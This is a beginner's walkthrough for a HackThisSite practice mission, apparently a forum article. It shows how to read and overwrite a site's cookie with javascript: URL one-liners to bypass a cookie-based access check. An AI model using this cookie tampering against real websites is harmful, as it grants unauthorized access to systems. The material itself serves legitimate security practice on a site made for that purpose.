Wow Sam is going to get a promotion soon if he keeps this up. But knowing that we were able to do that last 9, I think we can do this one. To tell you the truth I think this is the easiest um hard mission there is lol. Okay now the first thing you are going to notice there isn’t much directions given. Or any at all. So if you were paying attention and read the description of the mission before trying it you would have noticed that it said something about Javascript and cookies. Now this is actually a big clue. This means that the access is enabled by cookies. This is how you view a cookie using Javascript by simply typing it into your URL bar. javascript:alert(document.cookie); This simple and basic javascript code is how to view the cookie being used. Now this simple code is very important in figuring out how to do this. You will also need to know one more type of code. This one will change the cookie. javascript:void(document.cookie=”variable=value”); You will need this in order to complete your mission. Now the last thing I am going to tell is what I thought of trying. I am not sure if it actually works even thought I did it, but what I tried is using the alert code before trying to put in the password. Then after without actually putting a password, just click “submit” and then do the alert again to see if there was a change. Then after change accordingly in order to pass this mission. That is all I am tell you for this one. This should be enough information for you in order to complete this level.
Fnote: roflmao, again, inline javascript. Just remember tho, you must try to access page once, in order to get the cookie. So click on submit once, it’d tell you “you’re not 1337 enough to access”
Great article again: http://www.hackthissite.org/articles/read/405

I would just like to say thank you for reading my noob friendly tutorial for 1-10 basic missions for www.hackthissite.org and please comment this and give feedback via here on this article, PM me on msn, or send me a comment on my profile. I would like to say that I am deeply sorry if I let out too much information but this will also help the new people who are not quite use to this. I have never given the answer well practically but I have just guided them. So thank you again for reading this and I hope I helped out some noobs lol. PLEASE COMMENT!!

(might make more articles in the future so keep a look out!!)

~ sk8terboi43

I am still a noob but I have been able to complete all basic stages of the site. And now that I know how to do everything, (in basic ) I will break everything down to step by step instructions and make everything a bit easier to understand. This is my first article so please give me feedback. so PM for comments and well go to my page and give me feedback thanks!
P.S. I had to edit this thanks to magikstik. Thanks man for pointing out the major bug in my tutorial